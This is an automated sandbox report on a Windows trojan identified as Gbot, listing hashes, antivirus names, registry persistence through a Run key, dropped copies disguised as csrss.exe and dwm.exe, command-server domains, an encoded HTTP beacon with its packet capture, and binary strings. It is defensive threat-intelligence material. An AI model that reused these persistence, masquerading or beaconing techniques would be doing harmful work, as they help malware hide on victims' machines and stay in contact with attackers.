Analysis Date: 2013-10-29 02:39:10
MD5: b26504139f8143197e998cfec587af71
SHA1: 70715a76466b002bd44202e921af643b32de0d10

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section: .text md5: e7d2da57ab37aa2e7f42f41b1cd5d149 sha1: 919fc716ff60699a4c7ea7867ebbc285f8390fde size: 98304
Section: .rdata md5: a8abb2f5d7874802fb06b39bbee99b2d sha1: dcaf0f7ae20b2edbf730c94956314d1641ab39f8 size: 2048
Section: .data md5: e0cbbb64bef369c6d51865aa27cc1a16 sha1: 3101bf7e3e8d37139d6b1a62db9b58ce583c01e1 size: 56832
Section: .isete md5: 1f560b62ecea77dfd6a07a06d455eda7 sha1: 198a10cf9db48a57f069afe7decdb78ba1144b94 size: 1024
Timestamp: 2005-09-25 20:01:07
Version: ProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1396
PEhash: 9021b689d047875c82a423fa3103609c598e866d
AV avira: BDS/Gbot.aida
AV avg: Cryptic.DSK
AV clamav: Trojan.Agent-210246

Runtime Details:


Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: bigmusicarchive.com
Winsock DNS: folusho.com
Winsock DNS: 127.0.0.1
Winsock DNS: moremobileringtons.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: folusho.com
Type: A
67.222.55.143
DNS: moremobileringtons.com
Type: A
DNS: bigmusicarchive.com
Type: A
HTTP GET: http://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v86=33&tq=gHZutDyMv5rJeTbia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 67.222.55.143:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303130 2f30392f   uploads/2010/09/
0x00000020 (00032)   7765622d 32302d77 6861742d 69732d33   web-20-what-is-3
0x00000030 (00048)   30307832 35312e6a 70673f76 38363d33   00x251.jpg?v86=3
0x00000040 (00064)   33267471 3d67485a 75744479 4d763572   3&tq=gHZutDyMv5r
0x00000050 (00080)   4a655462 6961396e 726d736c 36676957   JeTbia9nrmsl6giW
0x00000060 (00096)   7a253242 4a5a6256 79412533 44204854   z%2BJZbVyA%3D HT
0x00000070 (00112)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000080 (00128)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000090 (00144)   20666f6c 7573686f 2e636f6d 0d0a4163    folusho.com..Ac
0x000000a0 (00160)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000b0 (00176)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x000000c0 (00192)   2e300d0a 0d0a                         .0....


Strings
040904b0
1.0.0.3
1396
&21Q
 2#q
2QP3
aA"0
aGEr
aPdz
B3%3
bAE0
FileVersion
#gP%
 gQ$
jjjjjj
p DA
PrivateBuild
ProductVersion
"Q2c
Q@c!
R1d0
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
+"[ <&
<0tbyst
13o?^Au
/1prP+
2c,pO"
2G8wsH
2IZX!A
"2|&|W
32nlllh
35?n	-
$.3HM:.
$3%j4U
3^M*RX=
3n	w*H
43c,08A
:45n\H
!(4Dk'%
4_K1j%h
4MTL<(
/4Xh<BODY
4Zc M+
544K-?
5c5(th
=6$1"k
-67bl.
,71@8v
+$83*?
85Og{^0
87tv'b
8U3l5L
95D5'bm
99jW(Tj
9bkL8Hp
9[+~M[
9@_*QA
	A7<DA
A8\#^M'PE
AddFontResourceExW
ADVAPI32.dll
alse"><
`at!lB
a)	Xgs
.B9Mc~
'BG=G0
BhA8C!
BMf'!kN
C7CF0'd
CBc499c
CharNextW
CharUpperW
C:^iBm
cL$	"j
CoCreateInstance
CoInitialize
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
CreateFileMappingW
CreateFontIndirectW
CreateStdAccessibleObject
Ctt@KpeF9
d%0T0#Z
@.data
dcMts=
DeleteObject
DispatchMessageW
d]|-jz
/dll:ol
)d~:m8
"d~OB$
DssWAoRy
dtn__^
dwt]h1
,E0/[X
E6l^v;
[ek-C(
|el`tev
EnumResourceNamesW
EViOI3
f[&Cg_i
"f>>DM5
F+eCj?"U
FillConsoleOutputAttribute
FindClose
-fj>:#
fLgHK51
<fm]-L2eE
+FPz.q
FreeEnvironmentStringsW
fr'smY
Ft[53S
gCBIu&
GDI32.dll
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetOutlineTextMetricsW
GetProcessMemoryInfo
GetProcessPriorityBoost
GetTextMetricsW
GetTickCount
GetWindowLongA
gG-,;Q
g{HvW|vC
GlobalAlloc
GlobalFree
gs=eic
  `h3/KgcuJkty
[h50(CV
h:a3h.v
h@h,($
h;j3wE
Ht	Me1a
I32.dll:SHmGP3Jjdl
.%I$ATS.
ifMqtVUjsi
Ii;^T$
`I]lde
InitializeCriticalSection
INPRTP>
INqKETF
.isete
ItSR<_D
I	W5I3t
J+3T+l
}:j@bUE
JtMxWHXu&
;jYB,h
K2MsW]
K8F>6ow
K{&dy?h
KERNEL32.dll
$<KfcuJjty
Kf"Kt/
KillTimer
ko1Q=+
ksovl-c
k(W2ED
l0@(,k7D
LiRpar
LJL>?	w
LockResource
L-oQ "
LresultFromObject
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
l	T~%l
LYO%gKv
m4is="/qn
!m/9[:
"M;.9;
m-,^}c
/mMiIVP
mtP2jcA
MultiByteToWideChar
N5E^4n
)N9::d
nbf7ra&u
neD4\~
n @pln
NSQA3xir
Nx^7+w
NX(JAI
o'8g~-U
O	+D1(
OD|KYL
>O J\0
[O~(L%
ole32.dll
OLEACC.dll
@Oojdd
OutputDebugStringW
oyA+bOBC
p3"	oInNnmeB
PostThreadMessageW
]Pr r8b
PSAPI.DLL
|PU7<j4
&puuotetLri
_q68R,
q:s[iem
`.rdata
Re>`3@B:4Hl
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteValueW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetValueExW
R}G28A
|rn;dpC
rs-nblA?PA
rSu h3
RYa1'F
S2732.Lil
SelectObject
SetTimer
SHELL32.dll
SHGetFileInfoW
|SH|OAPq)dl4
SMf"s!
StringFromCLSID
StringFromGUID2
stUeExm`ttQlnL
T5,.")
t7w]hU
!This program cannot be run in DOS mode.
Tlt'Rp
t.o8Awnt
TranslateMessage
}`u7Zj
=}uAaV
UnregisterClassA
ur5ntI
":U,r ?u`$
USER32.dll
VD()}E"
V,E>7D
VOS\p H\RP/
v;p$d;?
-V Toxor
VuYwpuU
W%)3)A
wGu;qws
WideCharToMultiByte
WieGMf
)W;Rx6X
@	ws0min<
wS]iv9P4t
wsprintfW
w#"VL!
W;Vr+W
@w&wPSs
Xd6_79
XMS O<u
xX9u: 
y-8W>V
YB[=CF
Y]@$co.
?($Z'\
ze@	RaK
Zne5PS